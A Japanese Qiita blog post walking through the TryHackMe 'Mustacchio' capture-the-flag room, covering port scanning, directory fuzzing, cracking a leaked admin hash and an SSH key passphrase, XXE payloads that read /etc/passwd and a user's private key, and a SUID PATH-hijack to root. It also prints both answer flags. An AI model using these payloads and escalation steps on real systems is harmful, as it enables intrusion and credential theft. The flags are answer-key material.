Go to Qiita Advent Calendar 2024 Top
LoginSignup
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

お題は不問!Qiita Engineer Festa 2024で記事投稿!
Qiita Engineer Festa20242024年7月17日まで開催中!
@kk0128

【TryHackMe】Mustacchio:Walkthrough

Posted at

概要

TryHackMe「Mustacchio」のWalkthroughです。

Task1

Q1.What is the user flag?

Hint.Check the source of the page

ポートスキャンを実行します。

$ nmap -Pn -sC -sV -A -T4 -p- 10.10.67.61 -oN nmap_result
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 58:1b:0c:0f:fa:cf:05:be:4c:c0:7a:f1:f1:88:61:1c (RSA)
|   256 3c:fc:e8:a3:7e:03:9a:30:2c:77:e0:0a:1c:e4:52:e6 (ECDSA)
|_  256 9d:59:c6:c7:79:c5:54:c4:1d:aa:e4:d1:84:71:01:92 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Mustacchio | Home
| http-robots.txt: 1 disallowed entry 
|_/
8765/tcp open  http    nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

ポートの稼働状況が分かりました。

ポート サービス バージョン
22 ssh OpenSSH 7.2p2
80 http Apache/2.4.18
8765 http nginx 1.10.3

80番ポートでWebサイトにアクセスできました。

home page.png

ディレクトリの列挙を行います。

$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http://10.10.67.61/FUZZ -recursion -recursion-depth 1 -ic -c -o ffuf_result
                        [Status: 200, Size: 1752, Words: 77, Lines: 73, Duration: 240ms]
images                  [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 239ms]
[INFO] Adding a new job to the queue: http://10.10.67.61/images/FUZZ

custom                  [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 239ms]
[INFO] Adding a new job to the queue: http://10.10.67.61/custom/FUZZ

[INFO] Starting queued job on target: http://10.10.67.61/images/FUZZ

                        [Status: 200, Size: 6166, Words: 308, Lines: 42, Duration: 243ms]
icons                   [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 241ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.10.67.61/images/icons/
[INFO] Starting queued job on target: http://10.10.67.61/custom/FUZZ

                        [Status: 200, Size: 1114, Words: 76, Lines: 18, Duration: 243ms]
css                     [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 242ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.10.67.61/custom/css/
js                      [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 241ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.10.67.61/custom/js/
:: Progress: [141695/141695] :: Job [3/3] :: 27 req/sec :: Duration: [0:14:53] :: Errors: 0 ::

/custom/jsにアクセスするとusers.bakファイルを発見しました。

custom js.png

ダウンロードし、データを見るとadminユーザーとパスワードのハッシュ値を発見しました。

users back.png

John The Ripperでパスワードを解析し、特定できました。

$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-AxCrypt"
Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-Linkedin"
Use the "--format=Raw-SHA1-Linkedin" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "ripemd-160"
Use the "--format=ripemd-160" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "has-160"
Use the "--format=has-160" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
bulldog19        (?)     
1g 0:00:00:00 DONE (2024-07-05 03:58) 14.28g/s 9773Kp/s 9773Kc/s 9773KC/s bulldog27..bullcrap1
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed.

8765ポートへアクセスすると管理者パネルのログインフォームが表示されました。

admin panel.png

admin:bulldog19でログインに成功しました。

dashboard.png

空白で送信すると、このフォームにはXMLコードを入力する必要があるとアラートが出ました。

alert.png

また、ソースコードを見るとBarryアカウントのSSHキーがあればSSH接続できそうだと分かりました。

comment.png

試しにペイロードを送信すると、XXE Injectionの動作を確認できました。

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
   <!ELEMENT data ANY >
   <!ENTITY name SYSTEM "file:///etc/passwd" >]>
<test>
  <name>&name;</name>
</test>

xxe inj.png

/home/barry/.ssh/id_rsaでプライベート鍵を取得します。

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
   <!ELEMENT data ANY >
   <!ENTITY name SYSTEM "file:///home/barry/.ssh/id_rsa" >]>
<test>
  <name>&name;</name>
</test>

ssh private.png

ローカルに、整形して保存します。

$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,D137279D69A43E71BB7FCB87FC61D25E

jqDJP+blUr+xMlASYB9t4gFyMl9VugHQJAylGZE6J/b1nG57eGYOM8wdZvVMGrfN 
(省略)
7mxN/N5LlosTefJnlhdIhIDTDMsEwjACA+q686+bREd+drajgk6R9eKgSME7geVD
-----END RSA PRIVATE KEY-----

ssh2johnでハッシュファイルに変換します。

$ ssh2john id_rsa > id_hash.txt

John The Ripperでパスワードを解析できました。

$ john id_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
urieljames       (id_rsa)     
1g 0:00:00:00 DONE (2024-07-05 05:52) 1.075g/s 3194Kp/s 3194Kc/s 3194KC/s urieljr.k..urielito1000
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

SSH接続をします。

$ ssh -i id_rsa barry@10.10.67.61
barry@mustacchio:~$

/home/barry/user.txtからユーザーフラグを入手します。

user.txt
62d77a4d5f97d47c5aa38b3b2651b831

A.62d77a4d5f97d47c5aa38b3b2651b831

Q2.What is the root flag?

Hint.SUID?

SUIDの検索を行うと/home/joe/live_logを見つけました。

$ find / -user root -perm -4000 2>/dev/null
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/newuidmap
/usr/bin/gpasswd
/home/joe/live_log
/bin/ping
/bin/ping6
/bin/umount
/bin/mount
/bin/fusermount
/bin/su

中の文字列や実行結果から、tail -f /var/log/nginx/access.log8765ポートへのアクセスログを取得していると分かりました。

$ strings /home/joe/live_log
(省略)
tail -f /var/log/nginx/access.log

$ ./live_log 
10.6.55.144 - - [05/Jul/2024:09:34:53 +0000] "GET /assets/Security%20Guide1101986381457 HTTP/1.1" 404 152 "-" "Fuzz Faster U Fool v2.1.0-dev"
10.6.55.144 - - [05/Jul/2024:09:34:53 +0000] "GET /assets/image0171101986756817 HTTP/1.1" 404 152 "-" "Fuzz Faster U Fool v2.1.0-dev"
10.6.55.144 - - [05/Jul/2024:11:35:25 +0000] "GET /assets/test HTTP/1.1" 404 152 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"

tailコマンドをbashコマンドなどに置き換えればシェルを取得できそうです。

$ cd /tmp
$ echo "/bin/bash" > tail
$ chmod 777 tail
$ export PATH=/tmp:$PATH

/home/joe/live_logを実行するとrootのシェルを取得できました。

$ /home/joe/live_log 
root@mustacchio:/tmp# whoami
root

/root/root.txtからフラグを入手します。

/root/root.txt
3223581420d906c4dd1a5f9b530393a5

A.3223581420d906c4dd1a5f9b530393a5

0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
Sign upLogin
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?